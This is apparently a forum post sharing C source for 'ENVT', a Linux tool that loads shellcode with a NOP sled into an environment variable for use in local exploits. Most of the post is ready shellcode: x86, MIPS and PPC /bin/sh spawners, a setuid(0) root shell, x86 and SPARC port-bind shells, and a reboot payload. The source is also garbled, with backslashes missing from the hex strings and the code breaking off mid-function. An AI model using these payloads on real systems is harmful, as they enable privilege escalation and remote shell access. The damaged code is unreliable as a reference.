Jump to content
darkking

ENVT v0.01, Simple Environment shellcode injector for linux

By darkking, in Programare

Recommended Posts

darkking Newbie

darkking

Posted
Posted

Tool for Linux , (*nix) .. it support pcc , sparc , mips , x86 procs ,

this tool injects shellcodes into linux environment and uses these shellcodes

for exploit developing , maybe IDS detections or testing and other stuff ....

[ SIGINT , SIGHUP , SIGABRT handlers added ]

/*
* Qnix <Qnix@bsdmail.org>
* ENVT v0.01
*
* */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define VERSION  "v0.1"
#define MAX_SIZE 1024
#define SHSIZE  512
#define bash  "/bin/bash"
/* Prototype */
void getenvaddr(char *environment);
void help(char *string);
void setshenv(int shellcode);
/****************** START OF SHELLCODES ******************/
char execve_binbash[] =
"x31xc0"                    // xor    %eax, %eax
"x50"                        // push   %eax
"x68x2fx2fx73x68"        // push   $0x68732f2f
"x68x2fx62x69x6e"        // push   $0x6e69622f
"x89xe3"                    // mov    %esp, %ebx
"x50"                        // push   %eax
"x53"                        // push   %ebx
"x89xe1"                    // mov    %esp, %ecx
"x31xd2"                    // xor    %edx, %edx
"xb0x0b"                    // mov    $0xb, %al
"xcdx80";                   // int    $0x80
char execve_setuid_setgid_bb[] =
"x6ax17"   // push $0x17
"x58"   // pop  %eax
"x31xdb"   // xor %ebx, %ebx
"xcdx80"   // int $0x80
"x6ax2e"   // push $0x2e
"x58"   // pop %eax
"x53"   // push %ebx
"xcdx80"   // int $0x80
"x31xd2"   // xor %edx, %edx
"x6ax0b"   // push $0xb
"x58"   // pop %eax
"x52"   // push %edx
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3"   // mov %esp, %ebx
"x52"   // push %edx
"x53"   // push %ebx
"x89xe1"   // mov %esp, %ecx
"xcdx80";   // int $0x80
char portbind_64713[] =
/* socket(AF_INET, SOCK_STREAM, 0) */
"x6ax66"   // push   $0x66
"x58"   // pop    %eax
"x6ax01"   // push   $0x1
"x5b"   // pop    %ebx
"x99"   // cltd
"x52"   // push   %edx
"x53"   // push   %ebx
"x6ax02"   // push   $0x2
"x89xe1"   // mov    %esp,%ecx
"xcdx80"   // int    $0x80
/* bind(s, server, sizeof(server)) */
"x52"   // push   %edx
"x66x68xfcxc9"  // pushw  $0xc9fc  // PORT = 64713
"x66x6ax02"  // pushw  $0x2
"x89xe1"   // mov    $esp,%ecx
"x6ax10"   // push   $0x10
"x51"   // push   %ecx
"x50"   // push   %eax
"x89xe1"   // mov    %esp,%ecx
"x89xc6"   // mov    %eax,%esi
"x43"   // inc    %ebx
"xb0x66"   // mov    $0x66,%al
"xcdx80"   // int    $0x80
/* listen(s, anything) */
"xb0x66"   // mov    $0x66,%al
"xd1xe3"   // shl    %ebx
"xcdx80"   // int    $0x80
/* accept(s, 0, 0) */
"x52"   // push   %edx
"x56"   // push   %esi
"x89xe1"   // mov    %esp,%ecx
"x43"   // inc    %ebx
"xb0x66"   // mov    $0x66,%al
"xcdx80"   // int    $0x80
"x93"   // xchg   %eax,%ebx
/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
"x6ax02"   // push   $0x2
"x59"   // pop    %ecx
"xb0x3f"   // mov    $0x3f,%al
"xcdx80"   // int    $0x80
"x49"   // dec    %ecx
"x79xf9"   // jns    dup_loop
/* execve("/bin/sh", ["/bin/sh"], NULL) */
"x6ax0b"   // push   $0xb
"x58"   // pop    %eax
"x52"   // push   %edx
"x68x2fx2fx73x68" // push   $0x68732f2f
"x68x2fx62x69x6e" // push   $0x6e69622f
"x89xe3"   // mov    %esp, %ebx
"x52"   // push   %edx
"x53"   // push   %ebx
"x89xe1"   // mov    %esp, %ecx
"xcdx80";   // int    $0x80
char reboot_20[] =
"x6ax58"              // push $0x58
"x58"                  // pop %eax
"xbbxadxdexe1xfe"  // mov $0xfee1dead,%ebx
"xb9x69x19x12x28"  // mov $0x28121969,%ecx
"xbax67x45x23x01"  // mov $0x1234567,%edx
"xcdx80";             // int $0x80
char sparc_portbind[]=
"x9dxe3xbfx78" // save  %sp, -136, %sp
"x90x10x20x02" // mov  2, %o0
"x92x10x20x01" // mov  1, %o1
"x94x22x80x0a" // sub  %o2, %o2, %o2
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st  %o2, [ %sp + 0x4c ]
"x90x10x20x01" // mov  1, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"xd0x27xbfxf4" // st  %o0, [ %fp + -12 ]
"x90x10x20x02" // mov  2, %o0
"xd0x37xbfxd8" // sth  %o0, [ %fp + -40 ]
"x13x08xc8xc8" // sethi  %hi(0x23232000), %o1
"x90x12x63x0f" // or  %o1, 0x30f, %o0
"xd0x37xbfxda" // sth  %o0, [ %fp + -38 ]
"xc0x27xbfxdc" // clr  [ %fp + -36 ]
"x92x07xbfxd8" // add  %fp, -40, %o1
"xd0x07xbfxf4" // ld  [ %fp + -12 ], %o0
"x94x10x20x10" // mov  0x10, %o2
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st  %o2, [ %sp + 0x4c ]
"x90x10x20x02" // mov  2, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"xd0x07xbfxf4" // ld  [ %fp + -12 ], %o0
"x92x10x20x05" // mov  5, %o1
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"x90x10x20x04" // mov  4, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"x92x07xbfxd8" // add  %fp, -40, %o1
"x94x07xbfxec" // add  %fp, -20, %o2
"xd0x07xbfxf4" // ld  [ %fp + -12 ], %o0
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st  %o2, [ %sp + 0x4c ]
"x90x10x20x05" // mov  5, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"xd0x27xbfxf0" // st  %o0, [ %fp + -16 ]
"xd0x07xbfxf0" // ld  [ %fp + -16 ], %o0
"x92x22x40x09" // sub  %o1, %o1, %o1
"x82x10x20x5a" // mov  0x5a, %g1
"x91xd0x20x10" // ta  0x10
"xd0x07xbfxf0" // ld  [ %fp + -16 ], %o0
"x92x10x20x01" // mov  1, %o1
"x82x10x20x5a" // mov  0x5a, %g1
"x91xd0x20x10" // ta  0x10
"xd0x07xbfxf0" // ld  [ %fp + -16 ], %o0
"x92x10x20x02" // mov  2, %o1
"x82x10x20x5a" // mov  0x5a, %g1
"x91xd0x20x10" // ta  0x10
"x2dx0bxd8x9a" // sethi  %hi(0x2f626800), %l6
"xacx15xa1x6e" // or  %l6, 0x16e, %l6
"x2fx0bxdcxda" // sethi  %hi(0x2f736800), %l7
"x90x0bx80x0e" // and  %sp, %sp, %o0
"x92x03xa0x08" // add  %sp, 8, %o1
"x94x22x80x0a" // sub  %o2, %o2, %o2
"x9cx03xa0x10" // add  %sp, 0x10, %sp
"xecx3bxbfxf0" // std  %l6, [ %sp + -16 ]
"xd0x23xbfxf8" // st  %o0, [ %sp + -8 ]
"xc0x23xbfxfc" // clr  [ %sp + -4 ]
"x82x10x20x3b" // mov  0x3b, %g1
"x91xd0x20x10"; // ta  0x10
char mips_sh[] =
/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
"xffxffx10x04xabx0fx02x24"
"x55xf0x46x20x66x06xffx23"
"xc2xf9xecx23x66x06xbdx23"
"x9axf9xacxafx9exf9xa6xaf"
"x9axf9xbdx23x21x20x80x01"
"x21x28xa0x03xccxcdx44x03"
"/bin/sh";
char ppc_sh[] =
"x7cx3fx0bx78" /*mr r31,r1*/
"x7cxa5x2ax79" /*xor. r5,r5,r5*/
"x42x40xffxf9" /*bdzl+ 10000454<main>*/
"x7fx08x02xa6" /*mflr r24*/
"x3bx18x01x34" /*addi r24,r24,308*/
"x98xb8xfexfb" /*stb r5,-261(r24)*/
"x38x78xfexf4" /*addi r3,r24,-268*/
"x90x61xffxf8" /*stw r3,-8(r1)*/
"x38x81xffxf8" /*addi r4,r1,-8*/
"x90xa1xffxfc" /*stw r5,-4(r1)*/
"x3bxc0x01x60" /*li r30,352*/
"x7fxc0x2ex70" /*srawi r0,r30,5*/
"x44xdexadxf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL
/******************  END OF SHELLCODES  ******************/
int main(int argc, char *argv[]) {
int  c;
char buf1[MAX_SIZE];
char *addr = getenv("ENVT");
int  buf1i;
extern char *optarg;
extern int  optind, optopt;
if(addr != NULL) {
getenvaddr(addr);
exit(0);
}
if(argc < 2) {
help(argv[0]);
}
while((c = getopt(argc, argv, ":s:lhv")) != -1) {
switch© {
  case 'v':
   version();
   break;
  case 'h':
   help(argv[0]);
  case 'l':
   shellcode_list();
   break;
  case 's':
   strncpy(buf1,optarg,MAX_SIZE-1);
   buf1i = atoi(buf1);
   setshenv(buf1i);
   break;
  case ':':
   fprintf(stderr,"Option -%c requires an operandn",optopt);
   break;
  }
}
return(0);
}
/*
* Display version .
*
* */
int version() {
fprintf(stdout,"ENVT %sn",VERSION);
fprintf(stdout,"Coded by Qnix <Qnix@bsdmail.org>n");
exit(0);
}
/*
* Display help .
*
* */
void getenvaddr(char *environment) {
fprintf(stdout,"SHELLCODE FOUND IN %pn",environment);
}
void help(char *string) {
fprintf(stderr,"Usage : %sn-l:(shellcode-list)n-s:<shellcode-number>n-h:(help)n-v:(version)n",string);
exit(0);
}
/*
* Display shellcode list .
*
* */
int shellcode_list() {
fprintf(stdout,"nttt::[ LINUX/x86 ]::n");
fprintf(stdout,"1) linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");
fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytesn");
fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytesn");
fprintf(stdout,"4) linux/x86 reboot() - 20 bytesnn");
fprintf(stdout,"ttt::[ LINUX/SPARC ]::n");
fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytesnn");
fprintf(stdout,"ttt::[ LINUX/MIPS  ]::n");
fprintf(stdout,"6) linux/mips execve /bin/sh 56 bytesnn");
fprintf(stdout,"ttt::[ LINUX/PPC  ]::n");
fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytesnn");
exit(0);
}
/*
* Set Shellcode in environment .
*
* */
void setshenv(int shellcode) {
char *addr = getenv("ENVT"); // Use to get shellcode addr
char execvebb[sHSIZE];  // Use for shellcode(1)
char setugbb[sHSIZE];  // Use for shellcode(2)
char portbind[sHSIZE];  // Use for shellcode(3)
char reboot[sHSIZE];  // Use for shellcode(4)
char sparc1[sHSIZE];  // Use for shellcode(5)
char mips1[sHSIZE];  // Use for shellcode(6)
char ppc1[sHSIZE];  // Use for shellcode(7)
if(shellcode >= 8) {
fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode);
exit(0);
}
/* Shellcode number 1 */
if(shellcode == 1) {
fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");
fprintf(stdout,"[+]t Setting memory for the shellcode .n");
memset(execvebb,0x90,SHSIZE);
fprintf(stdout,"[+]t Copying shellcode to memory .n");
memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash));
memcpy(execvebb,"ENVT=",5);
fprintf(stdout,"[+]t Putting shellcode in the environment .n");
putenv(execvebb);
fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash));
execl(bash, bash, '



			
		


		
			

				
					
						

	
	
		

			
				
				

					
				

			
			
			
		

	


					
				
				
			

		

		
			

		
	


	

	





	
Link to comment

	
		
	
	
	

	
	
Share on other sites

	

	


	

	

	




	



					
				
					
					
					





					
				
			
			



		

	


	
	

	
		
		

			
				
				

	
		

			
Join the conversation

			

	
				
					You can post now and register later.
				
				If you have an account, sign in now to post with your account.
				
			

	
		

	




	
	
		
	
		
	
		
	
	
		
		
	
	

		

		


	
		Guest
	


		

			
				
					
				
					
						
    
							
  • 
								


	
	
	
	

								
							
    • 
						

					
				
					
				
			
			
				
					
						
							
						
						



    

		
		

			
		

		
			
 Reply to this topic...

		
		

			

				
					×
					  Pasted as rich text.   Paste as plain text instead
				
			

		

		

			

				  Only 75 emoji are allowed.
			

		

		

			

				×
				  Your link has been automatically embedded.   Display as a link instead
			

		

		

			

			

		

		

			

				×
				  Your previous content has been restored.   Clear editor
			

		

		

			

				×
				  You cannot paste images directly. Upload or insert images from URL.
			

		

		
	

		
	

	

	

		

			×
			
		

		

	



						
					
				
					
				
					
				
			
			
    
				
					
						
					
						
					
						
							
  • 
								


    
	

    

								
							
    • 
						
					
				
				
					
  • 

	

    • 
				
			

		

	



			
		

	

	
		

			




		

		

			



		

	







	

		
			
				Go to topic listing
			
		
	

	




	

	

	


	

	




								


							

							


						

					

					
				

				

				

			

		

		
		


	×
	

		

			

			

				

					
				


			

			
		

	






	×
	

		

			
    
				
  • Create New...
    •